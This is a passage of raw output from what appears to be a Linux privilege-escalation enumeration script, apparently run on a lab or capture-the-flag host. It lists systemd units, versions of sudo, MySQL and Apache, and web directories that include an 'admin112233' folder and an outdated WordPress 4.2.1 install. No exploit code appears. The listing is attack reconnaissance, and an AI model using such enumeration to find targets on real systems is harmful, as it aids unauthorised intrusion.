-rw-r--r-- 1 root root  251 Apr  5  2016 cron.service
-rw-r--r-- 1 root root  131 Apr  5  2016 apt-daily.service
-rw-r--r-- 1 root root  162 Apr  5  2016 apt-daily.timer
-rw-r--r-- 1 root root  290 Apr  5  2016 rsyslog.service
-rw-r--r-- 1 root root  284 Apr  4  2016 lxcfs.service
-rw-r--r-- 1 root root  249 Apr  4  2016 console-setup.service
-rw-r--r-- 1 root root  491 Apr  1  2016 dbus.service
-rw-r--r-- 1 root root  106 Apr  1  2016 dbus.socket
-rw-r--r-- 1 root root  142 Mar 31  2016 apport-forward@.service
-rw-r--r-- 1 root root  225 Mar 31  2016 apport-forward.socket
-rw-r--r-- 1 root root  251 Mar 29  2016 open-vm-tools.service
-rw-r--r-- 1 root root  455 Mar 29  2016 iscsid.service
-rw-r--r-- 1 root root 1.1K Mar 29  2016 open-iscsi.service
-rw-r--r-- 1 root root  289 Feb 18  2016 unattended-upgrades.service
-rw-r--r-- 1 root root  248 Feb 10  2016 vsftpd.service
-rw-r--r-- 1 root root  115 Feb  9  2016 acpid.socket
-rw-r--r-- 1 root root  115 Feb  9  2016 acpid.path
-rw-r--r-- 1 root root  497 Jan 24  2016 ifup@.service
-rw-r--r-- 1 root root  169 Jan 14  2016 atd.service
-rw-r--r-- 1 root root  182 Jan 14  2016 polkitd.service
-rw-r--r-- 1 root root  722 Jan 13  2016 networking.service
-rw-r--r-- 1 root root  376 Jan  3  2016 netfilter-persistent.service
-rw-r--r-- 1 root root  924 Jul 30  2015 dnsmasq.service
-rw-r--r-- 1 root root  250 Feb 24  2015 ureadahead-stop.service
-rw-r--r-- 1 root root  242 Feb 24  2015 ureadahead-stop.timer
-rw-r--r-- 1 root root  401 Feb 24  2015 ureadahead.service
-rw-r--r-- 1 root root  188 Feb 24  2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Apr 12  2016 apache2-systemd.conf

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Apr 16  2016 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 16  2016 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Apr 16  2016 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Apr 16  2016 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 22 Jun  3  2016 console-setup.service -> /console-setup.service
lrwxrwxrwx 1 root root 15 Jun  3  2016 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 33 Jun  3  2016 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jun  3  2016 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jun  3  2016 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jun  3  2016 systemd-user-sessions.service -> ../systemd-user-sessions.service
lrwxrwxrwx 1 root root 24 Apr 16  2016 plymouth-quit.service -> ../plymouth-quit.service
lrwxrwxrwx 1 root root 29 Apr 16  2016 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 15 Apr  1  2016 dbus.service -> ../dbus.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jun  3  2016 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 28 Apr 16  2016 plymouth-poweroff.service -> ../plymouth-poweroff.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jun  3  2016 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 26 Apr 16  2016 plymouth-reboot.service -> ../plymouth-reboot.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 20 Jun  3  2016 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jun  3  2016 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jun  3  2016 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 28 Jun  3  2016 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 36 Jun  3  2016 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 32 Jun  3  2016 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Jun  3  2016 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jun  3  2016 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jun  3  2016 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Jun  3  2016 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Jun  3  2016 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 27 Jun  3  2016 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 Jun  3  2016 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 36 Jun  3  2016 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jun  3  2016 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jun  3  2016 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Jun  3  2016 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Jun  3  2016 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Jun  3  2016 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 24 Jun  3  2016 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 Jun  3  2016 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 Jun  3  2016 systemd-update-utmp.service -> ../systemd-update-utmp.service
lrwxrwxrwx 1 root root 30 Apr 16  2016 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Apr 16  2016 plymouth-start.service -> ../plymouth-start.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jun  3  2016 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jun  3  2016 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jun  3  2016 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Jun  3  2016 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Jun  3  2016 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Jun  3  2016 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 root root 14 Apr  1  2016 dbus.socket -> ../dbus.socket

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jun  3  2016 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Apr 12  2016 disable-with-time-daemon.conf

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Jun  3  2016 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jun  3  2016 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Jun  3  2016 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Apr 12  2016 debian.conf

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jun  3  2016 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jun  3  2016 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jun  3  2016 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/busnames.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Jun  3  2016 org.freedesktop.hostname1.busname -> ../org.freedesktop.hostname1.busname
lrwxrwxrwx 1 root root 34 Jun  3  2016 org.freedesktop.locale1.busname -> ../org.freedesktop.locale1.busname
lrwxrwxrwx 1 root root 33 Jun  3  2016 org.freedesktop.login1.busname -> ../org.freedesktop.login1.busname
lrwxrwxrwx 1 root root 35 Jun  3  2016 org.freedesktop.network1.busname -> ../org.freedesktop.network1.busname
lrwxrwxrwx 1 root root 35 Jun  3  2016 org.freedesktop.resolve1.busname -> ../org.freedesktop.resolve1.busname
lrwxrwxrwx 1 root root 35 Jun  3  2016 org.freedesktop.systemd1.busname -> ../org.freedesktop.systemd1.busname
lrwxrwxrwx 1 root root 36 Jun  3  2016 org.freedesktop.timedate1.busname -> ../org.freedesktop.timedate1.busname

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-generators:
total 668K
-rwxr-xr-x 1 root root 9.5K Apr 16  2016 lvm2-activation-generator
-rwxr-xr-x 1 root root  70K Apr 12  2016 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root  78K Apr 12  2016 systemd-fstab-generator
-rwxr-xr-x 1 root root  34K Apr 12  2016 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root  38K Apr 12  2016 systemd-insserv-generator
-rwxr-xr-x 1 root root  30K Apr 12  2016 systemd-rc-local-generator
-rwxr-xr-x 1 root root  26K Apr 12  2016 systemd-system-update-generator
-rwxr-xr-x 1 root root 102K Apr 12  2016 systemd-sysv-generator
-rwxr-xr-x 1 root root  58K Apr 12  2016 systemd-dbus1-generator
-rwxr-xr-x 1 root root  38K Apr 12  2016 systemd-debug-generator
-rwxr-xr-x 1 root root  38K Apr 12  2016 systemd-getty-generator
-rwxr-xr-x 1 root root 122K Apr 12  2016 systemd-gpt-auto-generator

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Apr 12  2016 90-systemd.preset

/lib/systemd/network:
total 16K
-rw-r--r-- 1 root root 404 Apr 12  2016 80-container-host0.network
-rw-r--r-- 1 root root 482 Apr 12  2016 80-container-ve.network
-rw-r--r-- 1 root root  80 Apr 12  2016 99-default.link
-rw-r--r-- 1 root root 247 Apr 12  2016 90-mac-for-usb.link

/lib/systemd/system-shutdown:
total 0

/lib/systemd/system-sleep:
total 0


### SOFTWARE #############################################
[[-] Sudo version:
Sudo version 1.8.16


[[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.7.12, for Linux (i686) using  EditLine wrapper


[[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built:   2016-04-15T18:00:57


[[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[[-] Installed Apache modules:
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 headers_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php7_module (shared)
 rewrite_module (shared)
 setenvif_module (shared)
 socache_shmcb_module (shared)
 ssl_module (shared)
 status_module (shared)


[[-] www home dir contents:
/var/www/:
total 12K
drwxr-xr-x  3 root root 4.0K Jun  6  2016 .
drwxr-xr-x 16 root root 4.0K Jun  6  2016 ..
drwxr-xr-x  5 root root 4.0K Jun  5  2016 https

/var/www/https:
total 460K
drwxr-xr-x 5 root root 4.0K Jun  5  2016 .
drwxr-xr-x 3 root root 4.0K Jun  6  2016 ..
drwxr-xr-x 2 root root 4.0K Jun  3  2016 admin112233
drwxr-xr-x 2 root root 4.0K Jun  4  2016 announcements
drwxr-xr-x 5 root root 4.0K Jun  4  2016 blogblog
-rw-r--r-- 1 root root 425K Jun  3  2016 custom_400.html
-rw-r--r-- 1 root root   92 Jun  4  2016 .htaccess
-rw-r--r-- 1 root root   21 Jun  5  2016 index.html
-rw-r--r-- 1 root root   59 Jun  3  2016 robots.txt

/var/www/https/admin112233:
total 12K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 5 root root 4.0K Jun  5  2016 ..
-rw-r--r-- 1 root root  275 Jun  3  2016 index.html

/var/www/https/announcements:
total 12K
drwxr-xr-x 2 root root 4.0K Jun  4  2016 .
drwxr-xr-x 5 root root 4.0K Jun  5  2016 ..
-rw-r--r-- 1 root root   61 Jun  4  2016 message.txt

/var/www/https/blogblog:
total 6.3M
drwxr-xr-x  5 root root 4.0K Jun  4  2016 .
drwxr-xr-x  5 root root 4.0K Jun  5  2016 ..
-rw-r--r--  1 root root  418 Jun  3  2016 index.php
-rw-r--r--  1 root root  20K Jun  3  2016 license.txt
-rw-r--r--  1 root root 7.2K Jun  3  2016 readme.html
-rw-r--r--  1 root root 6.1M Apr 27  2015 wordpress-4.2.1.tar.gz
-rw-r--r--  1 root root 4.9K Jun  3  2016 wp-activate.php
drwxr-xr-x  9 root root 4.0K Jun  3  2016 wp-admin
-rw-r--r--  1 root root  271 Jun  3  2016 wp-blog-header.php
-rw-r--r--  1 root root 4.9K Jun  3  2016 wp-comments-post.php
-rw-r--r--  1 root root 3.0K Jun  4  2016 wp-config.php
-rw-r--r--  1 root root 2.7K Jun  3  2016 wp-config-sample.php
drwxr-xr-x  5 root root 4.0K Jun  4  2016 wp-content
-rw-r--r--  1 root root 3.1K Jun  3  2016 wp-cron.php
drwxr-xr-x 12 root root 4.0K Jun  3  2016 wp-includes
-rw-r--r--  1 root root 2.4K Jun  3  2016 wp-links-opml.php
-rw-r--r--  1 root root 3.1K Jun  3  2016 wp-load.php
-rw-r--r--  1 root root  34K Jun  3  2016 wp-login.php
-rw-r--r--  1 root root 8.1K Jun  3  2016 wp-mail.php
-rw-r--r--  1 root root  11K Jun  3  2016 wp-settings.php
-rw-r--r--  1 root root  25K Jun  3  2016 wp-signup.php
-rw-r--r--  1 root root 4.0K Jun  3  2016 wp-trackback.php
-rw-r--r--  1 root root 3.0K Jun  3  2016 xmlrpc.php

/var/www/https/blogblog/wp-admin:
total 912K
drwxr-xr-x 9 root root 4.0K Jun  3  2016 .
drwxr-xr-x 5 root root 4.0K Jun  4  2016 ..
-rw-r--r-- 1 root root 8.2K Jun  3  2016 about.php
-rw-r--r-- 1 root root 3.5K Jun  3  2016 admin-ajax.php
-rw-r--r-- 1 root root 2.4K Jun  3  2016 admin-footer.php
-rw-r--r-- 1 root root  403 Jun  3  2016 admin-functions.php
-rw-r--r-- 1 root root 6.6K Jun  3  2016 admin-header.php
-rw-r--r-- 1 root root  11K Jun  3  2016 admin.php
-rw-r--r-- 1 root root 1.7K Jun  3  2016 admin-post.php
-rw-r--r-- 1 root root 4.1K Jun  3  2016 async-upload.php
-rw-r--r-- 1 root root  10K Jun  3  2016 comment.php
-rw-r--r-- 1 root root 6.8K Jun  3  2016 credits.php
drwxr-xr-x 3 root root 4.0K Jun  3  2016 css
-rw-r--r-- 1 root root  17K Jun  3  2016 custom-background.php
-rw-r--r-- 1 root root  42K Jun  3  2016 custom-header.php
-rw-r--r-- 1 root root 9.8K Jun  3  2016 customize.php
-rw-r--r-- 1 root root  12K Jun  3  2016 edit-comments.php
-rw-r--r-- 1 root root  30K Jun  3  2016 edit-form-advanced.php
-rw-r--r-- 1 root root 7.2K Jun  3  2016 edit-form-comment.php
-rw-r--r-- 1 root root 5.9K Jun  3  2016 edit-link-form.php
-rw-r--r-- 1 root root  15K Jun  3  2016 edit.php
-rw-r--r-- 1 root root 7.5K Jun  3  2016 edit-tag-form.php
-rw-r--r-- 1 root root  21K Jun  3  2016 edit-tags.php
-rw-r--r-- 1 root root 8.3K Jun  3  2016 export.php
-rw-r--r-- 1 root root 3.3K Jun  3  2016 freedoms.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 images
-rw-r--r-- 1 root root 5.1K Jun  3  2016 import.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 includes
-rw-r--r-- 1 root root 5.9K Jun  3  2016 index.php
-rw-r--r-- 1 root root 5.6K Jun  3  2016 install-helper.php
-rw-r--r-- 1 root root  12K Jun  3  2016 install.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 js
-rw-r--r-- 1 root root  712 Jun  3  2016 link-add.php
-rw-r--r-- 1 root root 3.4K Jun  3  2016 link-manager.php
-rw-r--r-- 1 root root 2.1K Jun  3  2016 link-parse-opml.php
-rw-r--r-- 1 root root 2.6K Jun  3  2016 link.php
-rw-r--r-- 1 root root 2.8K Jun  3  2016 load-scripts.php
-rw-r--r-- 1 root root 3.1K Jun  3  2016 load-styles.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 maint
-rw-r--r-- 1 root root 3.1K Jun  3  2016 media-new.php
-rw-r--r-- 1 root root 5.1K Jun  3  2016 media.php
-rw-r--r-- 1 root root 3.1K Jun  3  2016 media-upload.php
-rw-r--r-- 1 root root 8.4K Jun  3  2016 menu-header.php
-rw-r--r-- 1 root root  14K Jun  3  2016 menu.php
-rw-r--r-- 1 root root  320 Jun  3  2016 moderation.php
-rw-r--r-- 1 root root  211 Jun  3  2016 ms-admin.php
-rw-r--r-- 1 root root 3.7K Jun  3  2016 ms-delete-site.php
-rw-r--r-- 1 root root  231 Jun  3  2016 ms-edit.php
-rw-r--r-- 1 root root  236 Jun  3  2016 ms-options.php
-rw-r--r-- 1 root root  228 Jun  3  2016 ms-sites.php
-rw-r--r-- 1 root root  230 Jun  3  2016 ms-themes.php
-rw-r--r-- 1 root root  232 Jun  3  2016 ms-upgrade-network.php
-rw-r--r-- 1 root root  228 Jun  3  2016 ms-users.php
-rw-r--r-- 1 root root 4.6K Jun  3  2016 my-sites.php
-rw-r--r-- 1 root root  38K Jun  3  2016 nav-menus.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 network
-rw-r--r-- 1 root root  27K Jun  3  2016 network.php
-rw-r--r-- 1 root root  15K Jun  3  2016 options-discussion.php
-rw-r--r-- 1 root root  17K Jun  3  2016 options-general.php
-rw-r--r-- 1 root root  492 Jun  3  2016 options-head.php
-rw-r--r-- 1 root root 5.7K Jun  3  2016 options-media.php
-rw-r--r-- 1 root root  15K Jun  3  2016 options-permalink.php
-rw-r--r-- 1 root root  11K Jun  3  2016 options.php
-rw-r--r-- 1 root root 9.2K Jun  3  2016 options-reading.php
-rw-r--r-- 1 root root 7.8K Jun  3  2016 options-writing.php
-rw-r--r-- 1 root root  12K Jun  3  2016 plugin-editor.php
-rw-r--r-- 1 root root 5.0K Jun  3  2016 plugin-install.php
-rw-r--r-- 1 root root  21K Jun  3  2016 plugins.php
-rw-r--r-- 1 root root 2.5K Jun  3  2016 post-new.php
-rw-r--r-- 1 root root 8.7K Jun  3  2016 post.php
-rw-r--r-- 1 root root  541 Jun  3  2016 press-this.php
-rw-r--r-- 1 root root  296 Jun  3  2016 profile.php
-rw-r--r-- 1 root root 5.0K Jun  3  2016 revision.php
-rw-r--r-- 1 root root  14K Jun  3  2016 setup-config.php
-rw-r--r-- 1 root root  11K Jun  3  2016 theme-editor.php
-rw-r--r-- 1 root root  11K Jun  3  2016 theme-install.php
-rw-r--r-- 1 root root  19K Jun  3  2016 themes.php
-rw-r--r-- 1 root root 5.5K Jun  3  2016 tools.php
-rw-r--r-- 1 root root  28K Jun  3  2016 update-core.php
-rw-r--r-- 1 root root  10K Jun  3  2016 update.php
-rw-r--r-- 1 root root  338 Jun  3  2016 upgrade-functions.php
-rw-r--r-- 1 root root 4.2K Jun  3  2016 upgrade.php
-rw-r--r-- 1 root root  12K Jun  3  2016 upload.php
drwxr-xr-x 2 root root 4.0K Jun  3  2016 user
-rw-r--r-- 1 root root  23K Jun  3  2016 user-edit.php
-rw-r--r-- 1 root root  19K Jun  3  2016 user-new.php
-rw-r--r-- 1 root root  17K Jun  3  2016 users.php
-rw-r--r-- 1 root root  16K Jun  3  2016 widgets.php

/var/www/https/blogblog/wp-admin/css:
total 1.5M
drwxr-xr-x 3 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root 8.0K Jun  3  2016 about.css
-rw-r--r-- 1 root root 8.0K Jun  3  2016 about-rtl.css
-rw-r--r-- 1 root root  19K Jun  3  2016 admin-menu.css
-rw-r--r-- 1 root root  19K Jun  3  2016 admin-menu-rtl.css
-rw-r--r-- 1 root root 2.5K Jun  3  2016 color-picker.css
-rw-r--r-- 1 root root 2.1K Jun  3  2016 color-picker.min.css
-rw-r--r-- 1 root root 2.5K Jun  3  2016 color-picker-rtl.css
-rw-r--r-- 1 root root 2.1K Jun  3  2016 color-picker-rtl.min.css
drwxr-xr-x 9 root root 4.0K Jun  3  2016 colors
-rw-r--r-- 1 root root  55K Jun  3  2016 common.css
-rw-r--r-- 1 root root  55K Jun  3  2016 common-rtl.css
-rw-r--r-- 1 root root  25K Jun  3  2016 customize-controls.css
-rw-r--r-- 1 root root  21K Jun  3  2016 customize-controls.min.css
-rw-r--r-- 1 root root  25K Jun  3  2016 customize-controls-rtl.css
-rw-r--r-- 1 root root  21K Jun  3  2016 customize-controls-rtl.min.css
-rw-r--r-- 1 root root  15K Jun  3  2016 customize-widgets.css
-rw-r--r-- 1 root root  12K Jun  3  2016 customize-widgets.min.css
-rw-r--r-- 1 root root  15K Jun  3  2016 customize-widgets-rtl.css
-rw-r--r-- 1 root root  12K Jun  3  2016 customize-widgets-rtl.min.css
-rw-r--r-- 1 root root  20K Jun  3  2016 dashboard.css
-rw-r--r-- 1 root root  20K Jun  3  2016 dashboard-rtl.css
-rw-r--r-- 1 root root 6.3K Jun  3  2016 deprecated-media.css
-rw-r--r-- 1 root root 5.2K Jun  3  2016 deprecated-media.min.css
-rw-r--r-- 1 root root 6.3K Jun  3  2016 deprecated-media-rtl.css
-rw-r--r-- 1 root root 5.2K Jun  3  2016 deprecated-media-rtl.min.css
-rw-r--r-- 1 root root  28K Jun  3  2016 edit.css
-rw-r--r-- 1 root root  28K Jun  3  2016 edit-rtl.css
-rw-r--r-- 1 root root  611 Jun  3  2016 farbtastic.css
-rw-r--r-- 1 root root  612 Jun  3  2016 farbtastic-rtl.css
-rw-r--r-- 1 root root  21K Jun  3  2016 forms.css
-rw-r--r-- 1 root root  21K Jun  3  2016 forms-rtl.css
-rw-r--r-- 1 root root  12K Jun  3  2016 ie.css
-rw-r--r-- 1 root root  11K Jun  3  2016 ie.min.css
-rw-r--r-- 1 root root  12K Jun  3  2016 ie-rtl.css
-rw-r--r-- 1 root root  11K Jun  3  2016 ie-rtl.min.css
-rw-r--r-- 1 root root 6.1K Jun  3  2016 install.css
-rw-r--r-- 1 root root 5.0K Jun  3  2016 install.min.css
-rw-r--r-- 1 root root 6.1K Jun  3  2016 install-rtl.css
-rw-r--r-- 1 root root 5.0K Jun  3  2016 install-rtl.min.css
-rw-r--r-- 1 root root 3.2K Jun  3  2016 l10n.css
-rw-r--r-- 1 root root 3.2K Jun  3  2016 l10n-rtl.css
-rw-r--r-- 1 root root  34K Jun  3  2016 list-tables.css
-rw-r--r-- 1 root root  34K Jun  3  2016 list-tables-rtl.css
-rw-r--r-- 1 root root 4.0K Jun  3  2016 login.css
-rw-r--r-- 1 root root  22K Jun  3  2016 login.min.css
-rw-r--r-- 1 root root 4.0K Jun  3  2016 login-rtl.css
-rw-r--r-- 1 root root  22K Jun  3  2016 login-rtl.min.css
-rw-r--r-- 1 root root  21K Jun  3  2016 media.css
-rw-r--r-- 1 root root  21K Jun  3  2016 media-rtl.css
-rw-r--r-- 1 root root  15K Jun  3  2016 nav-menus.css
-rw-r--r-- 1 root root  15K Jun  3  2016 nav-menus-rtl.css
-rw-r--r-- 1 root root  30K Jun  3  2016 press-this.css
-rw-r--r-- 1 root root 1.4K Jun  3  2016 press-this-editor.css
-rw-r--r-- 1 root root 1.4K Jun  3  2016 press-this-editor-rtl.css
-rw-r--r-- 1 root root  24K Jun  3  2016 press-this.min.css
-rw-r--r-- 1 root root  30K Jun  3  2016 press-this-rtl.css
-rw-r--r-- 1 root root  24K Jun  3  2016 press-this-rtl.min.css
-rw-r--r-- 1 root root 9.9K Jun  3  2016 revisions.css
-rw-r--r-- 1 root root 9.9K Jun  3  2016 revisions-rtl.css
-rw-r--r-- 1 root root  36K Jun  3  2016 themes.css
-rw-r--r-- 1 root root  36K Jun  3  2016 themes-rtl.css
-rw-r--r-- 1 root root  11K Jun  3  2016 widgets.css
-rw-r--r-- 1 root root  11K Jun  3  2016 widgets-rtl.css
-rw-r--r-- 1 root root  337 Jun  3  2016 wp-admin.css
-rw-r--r-- 1 root root 217K Jun  3  2016 wp-admin.min.css
-rw-r--r-- 1 root root  389 Jun  3  2016 wp-admin-rtl.css
-rw-r--r-- 1 root root 218K Jun  3  2016 wp-admin-rtl.min.css

/var/www/https/blogblog/wp-admin/css/colors:
total 56K
drwxr-xr-x 9 root root 4.0K Jun  3  2016 .
drwxr-xr-x 3 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  12K Jun  3  2016 _admin.scss
drwxr-xr-x 2 root root 4.0K Jun  3  2016 blue
drwxr-xr-x 2 root root 4.0K Jun  3  2016 coffee
drwxr-xr-x 2 root root 4.0K Jun  3  2016 ectoplasm
drwxr-xr-x 2 root root 4.0K Jun  3  2016 light
drwxr-xr-x 2 root root 4.0K Jun  3  2016 midnight
-rw-r--r-- 1 root root 1.3K Jun  3  2016 _mixins.scss
drwxr-xr-x 2 root root 4.0K Jun  3  2016 ocean
drwxr-xr-x 2 root root 4.0K Jun  3  2016 sunrise
-rw-r--r-- 1 root root 1.9K Jun  3  2016 _variables.scss

/var/www/https/blogblog/wp-admin/css/colors/blue:
total 68K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  14K Jun  3  2016 colors.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors.min.css
-rw-r--r-- 1 root root  14K Jun  3  2016 colors-rtl.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors-rtl.min.css
-rw-r--r-- 1 root root  249 Jun  3  2016 colors.scss

/var/www/https/blogblog/wp-admin/css/colors/coffee:
total 68K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  14K Jun  3  2016 colors.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors.min.css
-rw-r--r-- 1 root root  14K Jun  3  2016 colors-rtl.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors-rtl.min.css
-rw-r--r-- 1 root root  135 Jun  3  2016 colors.scss

/var/www/https/blogblog/wp-admin/css/colors/ectoplasm:
total 68K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  14K Jun  3  2016 colors.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors.min.css
-rw-r--r-- 1 root root  14K Jun  3  2016 colors-rtl.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors-rtl.min.css
-rw-r--r-- 1 root root  157 Jun  3  2016 colors.scss

/var/www/https/blogblog/wp-admin/css/colors/light:
total 68K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  14K Jun  3  2016 colors.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors.min.css
-rw-r--r-- 1 root root  14K Jun  3  2016 colors-rtl.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors-rtl.min.css
-rw-r--r-- 1 root root 1.1K Jun  3  2016 colors.scss

/var/www/https/blogblog/wp-admin/css/colors/midnight:
total 68K
drwxr-xr-x 2 root root 4.0K Jun  3  2016 .
drwxr-xr-x 9 root root 4.0K Jun  3  2016 ..
-rw-r--r-- 1 root root  14K Jun  3  2016 colors.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors.min.css
-rw-r--r-- 1 root root  14K Jun  3  2016 colors-rtl.css
-rw-r--r-- 1 root root  12K Jun  3  2016 colors-rtl.min.css
-rw-r--r-- 1 root root  106 Jun  3  2016 colors.scss

/var/www/https/blogblog/wp-admin/css/colors/ocean:
total 68K
